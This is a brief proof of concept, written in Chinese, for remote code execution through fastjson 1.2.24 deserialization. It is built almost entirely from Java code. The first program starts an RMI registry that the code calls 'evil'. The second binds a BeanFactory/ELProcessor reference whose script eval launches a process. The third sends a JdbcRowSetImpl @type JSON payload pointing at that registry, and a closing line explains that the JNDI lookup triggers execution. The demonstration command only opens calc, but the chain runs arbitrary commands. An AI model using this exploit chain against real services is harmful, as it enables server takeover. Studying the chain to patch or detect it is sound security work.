1.程序1启动rmi管理服务
System.out.println("Creating evil RMI registry on port 9527");
LocateRegistry.createRegistry(1111);
System.out.println("======启动Rmi成功!======");
Thread.currentThread().join();
2.程序2注册rmi服务
ResourceRef ref = new ResourceRef("javax.el.ELProcessor", null, "", "", true,"org.apache.naming.factory.BeanFactory",null);
ref.add(new StringRefAddr("forceString", "x=eval"));
ref.add(new StringRefAddr("x", "\"\".getClass().forName(\"javax.script.ScriptEngineManager\").newInstance().getEngineByName(\"JavaScript\").eval(\"new java.lang.ProcessBuilder['(java.lang.String[])'](['calc']).start()\")"));
ReferenceWrapper referenceWrapper = new ReferenceWrapper(ref);
Naming.bind("rmi://127.0.0.1:1111/service1", referenceWrapper);
System.out.println("RMI服务启动成功,服务地址:" + "rmi://127.0.0.1:1111/service1");
3.程序3中fastjson序列号中会用到rmi服务,执行注册到rmi服务中的服务,
<fastjson.version>1.2.24</fastjson.version>
String json="{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\"dataSourceName\":\"rmi://127.0.0.1:1111/service1\",\"autoCommit\":true}";
JSON.parseObject(json);
4.因为fastjson的parseObject方法中会使用到jndi查找方法,类似this.registry.lookup("rmi://127.0.0.1:1111/service1");,这句就会触发具体远程方法的执行,导致漏洞被利用